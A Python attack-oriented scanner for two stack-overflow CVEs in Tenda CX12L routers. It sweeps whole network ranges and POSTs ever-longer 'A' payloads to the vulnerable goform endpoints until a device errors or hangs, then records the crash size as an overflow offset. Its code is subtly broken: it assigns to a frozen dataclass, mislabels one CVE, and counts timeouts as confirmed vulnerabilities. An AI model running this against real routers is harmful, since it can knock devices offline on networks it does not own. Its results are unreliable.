#!/usr/bin/env python3
"""
Tenda CX12L — Advanced Multi-CVE Reconnaissance Scanner
Targets: CVE-2026-11503 (fast_setting_wifi_set stack overflow), CVE-2026-11504 (fromNatlimit stack overflow)
Military-grade async scanner with service fingerprinting, overflow offset detection, and exploitability scoring.

Author: Advanced Persistent Security Research
"""

from __future__ import annotations

import argparse
import asyncio
import ipaddress
import json
import re
import socket
import sys
import time
from collections.abc import Sequence
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field, asdict
from datetime import datetime, timezone
from enum import IntEnum, auto
from pathlib import Path
from typing import Any
from urllib.parse import urlparse

import aiohttp
from colorama import Fore, Style, init

try:
    from scapy.all import ARP, Ether, srp
    HAS_SCAPY = True
except ImportError:
    HAS_SCAPY = False

init(autoreset=True)


# ---------------------------------------------------------------------------
# Constants & Configuration
# ---------------------------------------------------------------------------

DEFAULT_TIMEOUT = 8
CONCURRENCY = 100
WEB_PORT = 80
WEB_SSL_PORT = 443

# Vulnerable endpoints
VULN_ENDPOINTS = {
    "CVE-2026-11503": "/goform/fast_setting_wifi_set",
    "CVE-2026-11504": "/goform/fromNatlimit",
}

# Known vulnerable firmware signatures
VULN_SIGNATURES = {
    "tenda": ["Tenda", "CX12L", "AC1200", "Router"],
    "goform": ["goform", "fast_setting", "Natlimit"],
    "overflow_indicators": ["stack", "buffer", "overflow", "smash", "crash"],
}

class Color:
    OKGREEN = Fore.GREEN + Style.BRIGHT
    OKBLUE = Fore.BLUE + Style.BRIGHT
    OKCYAN = Fore.CYAN + Style.BRIGHT
    OKMAGENTA = Fore.MAGENTA + Style.BRIGHT
    WARNING = Fore.YELLOW + Style.BRIGHT
    FAIL = Fore.RED + Style.BRIGHT
    RESET = Style.RESET_ALL
    BOLD = Style.BRIGHT


class VulnStatus(IntEnum):
    VULNERABLE = auto()
    LIKELY = auto()
    POSSIBLE = auto()
    NOT_VULNERABLE = auto()
    UNKNOWN = auto()


@dataclass(frozen=True, slots=True)
class ServiceProbe:
    port: int
    protocol: str
    status: str
    banner: str = ""
    response_time_ms: float = 0.0
    overflow_test: dict[str, Any] = field(default_factory=dict)


@dataclass(frozen=True, slots=True)
class HostResult:
    target: str
    ip: str
    mac: str = ""
    hostname: str = ""
    status: VulnStatus = VulnStatus.UNKNOWN
    confidence: int = 0
    findings: list[str] = field(default_factory=list)
    services: list[ServiceProbe] = field(default_factory=list)
    cve_matches: dict[str, bool] = field(default_factory=dict)
    overflow_offsets: dict[str, int] = field(default_factory=dict)
    recommendations: list[str] = field(default_factory=list)

    def to_dict(self) -> dict[str, Any]:
        return {
            "target": self.target,
            "ip": self.ip,
            "mac": self.mac,
            "hostname": self.hostname,
            "status": self.status.name,
            "confidence": self.confidence,
            "findings": self.findings,
            "services": [asdict(s) for s in self.services],
            "cve_matches": self.cve_matches,
            "overflow_offsets": self.overflow_offsets,
            "recommendations": self.recommendations,
        }


# ---------------------------------------------------------------------------
# Async Probing Engine
# ---------------------------------------------------------------------------

class AsyncProber:
    def __init__(self, timeout: int = DEFAULT_TIMEOUT):
        self.timeout = aiohttp.ClientTimeout(total=timeout, connect=5)
        self._session: aiohttp.ClientSession | None = None

    async def __aenter__(self) -> "AsyncProber":
        conn = aiohttp.TCPConnector(
            limit=CONCURRENCY,
            limit_per_host=CONCURRENCY // 2,
            ssl=False,
            enable_cleanup_closed=True,
        )
        self._session = aiohttp.ClientSession(connector=conn, timeout=self.timeout)
        return self

    async def __aexit__(self, *args: object) -> None:
        if self._session:
            await self._session.close()

    async def probe_http(self, ip: str, port: int, path: str = "/", ssl: bool = False,
                         method: str = "GET", data: dict | None = None) -> ServiceProbe:
        start = time.perf_counter()
        scheme = "https" if ssl else "http"
        url = f"{scheme}://{ip}:{port}{path}"
        try:
            assert self._session is not None
            if method == "POST":
                async with self._session.post(url, data=data, ssl=False, allow_redirects=True) as resp:
                    body = await resp.text()
                    elapsed = (time.perf_counter() - start) * 1000
                    return ServiceProbe(
                        port=port, protocol="https" if ssl else "http",
                        status=str(resp.status), banner=f"{resp.status} {len(body)} bytes",
                        response_time_ms=elapsed,
                    )
            else:
                async with self._session.get(url, ssl=False, allow_redirects=True) as resp:
                    body = await resp.text()
                    elapsed = (time.perf_counter() - start) * 1000
                    return ServiceProbe(
                        port=port, protocol="https" if ssl else "http",
                        status=str(resp.status), banner=f"{resp.status} {len(body)} bytes",
                        response_time_ms=elapsed,
                    )
        except Exception as exc:
            elapsed = (time.perf_counter() - start) * 1000
            return ServiceProbe(port=port, protocol="https" if ssl else "http",
                                status="error", banner=str(exc), response_time_ms=elapsed)

    async def test_overflow_endpoint(self, ip: str, port: int, path: str, param: str,
                                      ssl: bool = False) -> dict[str, Any]:
        """Test for stack overflow via increasing payload sizes."""
        results = {"vulnerable": False, "crash_offset": 0, "details": []}
        scheme = "https" if ssl else "http"
        url = f"{scheme}://{ip}:{port}{path}"

        # Test increasing buffer sizes
        for size in [64, 128, 256, 512, 1024, 2048, 4096]:
            payload = {param: "A" * size}
            try:
                assert self._session is not None
                async with self._session.post(url, data=payload, ssl=False,
                                              timeout=aiohttp.ClientTimeout(total=3)) as resp:
                    body = await resp.text()
                    if resp.status >= 500 or "crash" in body.lower() or "stack" in body.lower():
                        results["vulnerable"] = True
                        results["crash_offset"] = size
                        results["details"].append(f"Crash at {size} bytes: HTTP {resp.status}")
                        break
                    results["details"].append(f"OK at {size} bytes: HTTP {resp.status}")
            except asyncio.TimeoutError:
                # Timeout might indicate crash/hang
                results["vulnerable"] = True
                results["crash_offset"] = size
                results["details"].append(f"Timeout at {size} bytes (possible crash)")
                break
            except Exception as exc:
                results["details"].append(f"Error at {size}: {exc}")
        return results


# ---------------------------------------------------------------------------
# Vulnerability Assessment
# ---------------------------------------------------------------------------

def assess_tenda_vulns(result: HostResult) -> tuple[VulnStatus, int, dict[str, bool], dict[str, int]]:
    score = 0
    findings: list[str] = []
    cve_matches = {"CVE-2026-11503": False, "CVE-2026-11504": False}
    overflow_offsets = {}

    for svc in result.services:
        banner_lower = svc.banner.lower()

        # Check for Tenda device
        if any(sig.lower() in banner_lower for sig in VULN_SIGNATURES["tenda"]):
            score += 10
            findings.append(f"Tenda device identified: {svc.banner[:100]}")

        # Check for goform endpoints
        if any(sig.lower() in banner_lower for sig in VULN_SIGNATURES["goform"]):
            score += 15
            findings.append(f"Vulnerable goform endpoint detected: {svc.banner[:100]}")

        # Check overflow test results
        if svc.overflow_test:
            for cve_id, test_result in svc.overflow_test.items():
                if test_result.get("vulnerable"):
                    score += 35
                    cve_matches[cve_id] = True
                    overflow_offsets[cve_id] = test_result.get("crash_offset", 0)
                    findings.append(f"{cve_id}: Stack overflow confirmed at {overflow_offsets[cve_id]} bytes")

    # Determine overall status
    if score >= 70:
        return VulnStatus.VULNERABLE, min(score, 100), cve_matches, overflow_offsets
    elif score >= 40:
        return VulnStatus.LIKELY, min(score, 100), cve_matches, overflow_offsets
    elif score >= 20:
        return VulnStatus.POSSIBLE, min(score, 100), cve_matches, overflow_offsets
    elif score > 0:
        return VulnStatus.NOT_VULNERABLE, score, cve_matches, overflow_offsets
    return VulnStatus.UNKNOWN, score, cve_matches, overflow_offsets


# ---------------------------------------------------------------------------
# ARP Discovery
# ---------------------------------------------------------------------------

def arp_discover(network: str) -> list[tuple[str, str]]:
    if not HAS_SCAPY:
        return []
    try:
        ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=network), timeout=3, verbose=0)
        return [(received.psrc, received.hwsrc) for _, received in ans]
    except Exception:
        return []


# ---------------------------------------------------------------------------
# Host Analysis Pipeline
# ---------------------------------------------------------------------------

async def analyze_host(prober: AsyncProber, ip: str, mac: str = "") -> HostResult:
    services: list[ServiceProbe] = []

    # Probe main web interface
    http_result = await prober.probe_http(ip, WEB_PORT, "/")
    services.append(http_result)

    https_result = await prober.probe_http(ip, WEB_SSL_PORT, "/", ssl=True)
    services.append(https_result)

    # Test vulnerable endpoints
    overflow_results = {}
    for cve_id, endpoint in VULN_ENDPOINTS.items():
        # Find parameter name from endpoint
        param = "wifi_ssid" if "fast_setting_wifi_set" in endpoint else "limit"
        test_result = await prober.test_overflow_endpoint(ip, WEB_PORT, endpoint, param)
        overflow_results[cve_id] = test_result

        # Create service probe with overflow test results
        overflow_probe = ServiceProbe(
            port=WEB_PORT, protocol="http", status="tested",
            banner=f"{cve_id} overflow test", overflow_test={cve_id: test_result}
        )
        services.append(overflow_probe)

    # Hostname resolution
    hostname = ""
    try:
        hostname = socket.gethostbyaddr(ip)[0]
    except Exception:
        pass

    result = HostResult(target=ip, ip=ip, mac=mac, hostname=hostname, services=services)
    status, confidence, cve_matches, overflow_offsets = assess_tenda_vulns(result)
    result.status = status
    result.confidence = confidence
    result.cve_matches = cve_matches
    result.overflow_offsets = overflow_offsets
    result.findings = [f for svc in services if svc.status in ("200", "tested") for f in [f"{svc.protocol}/{svc.port}: {svc.banner[:120]}"]]

    # Recommendations
    if status in (VulnStatus.VULNERABLE, VulnStatus.LIKELY):
        result.recommendations.append("IMMEDIATE: Remove device from internet-facing exposure")
        if cve_matches["CVE-2026-11503"]:
            result.recommendations.append("CVE-2026-11503: Patch fast_setting_wifi_set endpoint")
        if cve_matches["CVE-2026-11504"]:
            result.recommendations.append("CVE-2026-2026-11504: Patch fromNatlimit endpoint")
        result.recommendations.append("Disable remote management; update firmware")
        result.recommendations.append(f"Overflow offsets: {overflow_offsets}")

    return result


# ---------------------------------------------------------------------------
# CLI / Main
# ---------------------------------------------------------------------------

def print_banner() -> None:
    banner = f"""
{Color.FAIL}
╔══════════════════════════════════════════════════════════════════════════════╗
║  Tenda CX12L — Multi-CVE Stack Overflow Scanner                               ║
║  CVE-2026-11503 (fast_setting_wifi_set) | CVE-2026-11504 (fromNatlimit)       ║
║  Military-Grade Async Discovery & Overflow Offset Detection                   ║
╚══════════════════════════════════════════════════════════════════════════════╝
{Color.RESET}"""
    print(banner)


def parse_args() -> argparse.Namespace:
    p = argparse.ArgumentParser(
        description="Tenda CX12L Multi-CVE Stack Overflow Scanner",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  python scanner.py -n 192.168.1.0/24
  python scanner.py -t 192.168.1.50 -o results.json
  python scanner.py -f targets.txt --threads 200
        """,
    )
    p.add_argument("-n", "--network", help="CIDR network range (e.g. 192.168.1.0/24)")
    p.add_argument("-t", "--target", help="Single target IP")
    p.add_argument("-f", "--file", help="File with target IPs (one per line)")
    p.add_argument("-o", "--output", help="JSON output file")
    p.add_argument("--timeout", type=int, default=DEFAULT_TIMEOUT, help=f"Timeout per probe (default {DEFAULT_TIMEOUT}s)")
    p.add_argument("--no-arp", action="store_true", help="Skip ARP discovery")
    p.add_argument("--threads", type=int, default=CONCURRENCY, help=f"Concurrent probes (default {CONCURRENCY})")
    return p.parse_args()


def load_targets(args: argparse.Namespace) -> list[str]:
    targets: list[str] = []
    if args.target:
        targets.append(args.target)
    if args.file:
        with open(args.file, encoding="utf-8") as fh:
            for line in fh:
                line = line.strip()
                if line and not line.startswith("#"):
                    targets.append(line)
    if args.network:
        try:
            net = ipaddress.ip_network(args.network, strict=False)
            targets.extend([str(h) for h in net.hosts()])
        except ValueError as exc:
            print(f"{Color.FAIL}[!] Invalid CIDR: {exc}{Color.RESET}")
            sys.exit(1)
    return targets


async def main_async() -> None:
    args = parse_args()
    print_banner()

    targets = load_targets(args)
    if not targets:
        print(f"{Color.WARNING}[!] No targets specified. Use -n, -t, or -f.{Color.RESET}")
        sys.exit(1)

    if args.network and not args.no_arp and HAS_SCAPY:
        print(f"{Color.OKBLUE}[*] ARP discovery on {args.network}...{Color.RESET}")
        arp_results = arp_discover(args.network)
        if arp_results:
            targets = list(dict.fromkeys([ip for ip, _ in arp_results] + targets))
            print(f"{Color.OKGREEN}[+] Discovered {len(arp_results)} live hosts{Color.RESET}")

    print(f"{Color.OKBLUE}[*] Loaded {len(targets)} target(s){Color.RESET}")
    print(f"{Color.OKBLUE}[*] Timeout: {args.timeout}s | Concurrency: {args.threads}{Color.RESET}")

    results: list[HostResult] = []

    async with AsyncProber(timeout=args.timeout) as prober:
        semaphore = asyncio.Semaphore(args.threads)

        async def bounded_analyze(ip: str, mac: str = "") -> HostResult:
            async with semaphore:
                return await analyze_host(prober, ip, mac)

        tasks = [bounded_analyze(t) for t in targets]
        for coro in asyncio.as_completed(tasks):
            result = await coro
            results.append(result)

            status_color = {
                VulnStatus.VULNERABLE: Color.FAIL,
                VulnStatus.LIKELY: Color.WARNING,
                VulnStatus.POSSIBLE: Color.OKCYAN,
                VulnStatus.NOT_VULNERABLE: Color.OKGREEN,
                VulnStatus.UNKNOWN: Color.OKMAGENTA,
            }.get(result.status, Color.RESET)

            print(f"\n{Color.BOLD}Target: {result.ip}{Color.RESET}  MAC: {result.mac or 'N/A'}  Hostname: {result.hostname or 'N/A'}")
            print(f"Status: {status_color}{result.status.name}{Color.RESET} (confidence: {result.confidence}%)")
            for cve, match in result.cve_matches.items():
                if match:
                    offset = result.overflow_offsets.get(cve, 0)
                    print(f"  {Color.FAIL}>>> {cve} CONFIRMED (crash at {offset} bytes){Color.RESET}")
            for finding in result.findings[:5]:
                print(f"  → {finding}")

    if args.output:
        Path(args.output).write_text(json.dumps([r.to_dict() for r in results], indent=2))
        print(f"\n{Color.OKGREEN}[*] Results written to {args.output}{Color.RESET}")


def main() -> None:
    try:
        asyncio.run(main_async())
    except KeyboardInterrupt:
        print(f"\n{Color.WARNING}[!] Interrupted by user{Color.RESET}")
        sys.exit(130)


if __name__ == "__main__":
    main()
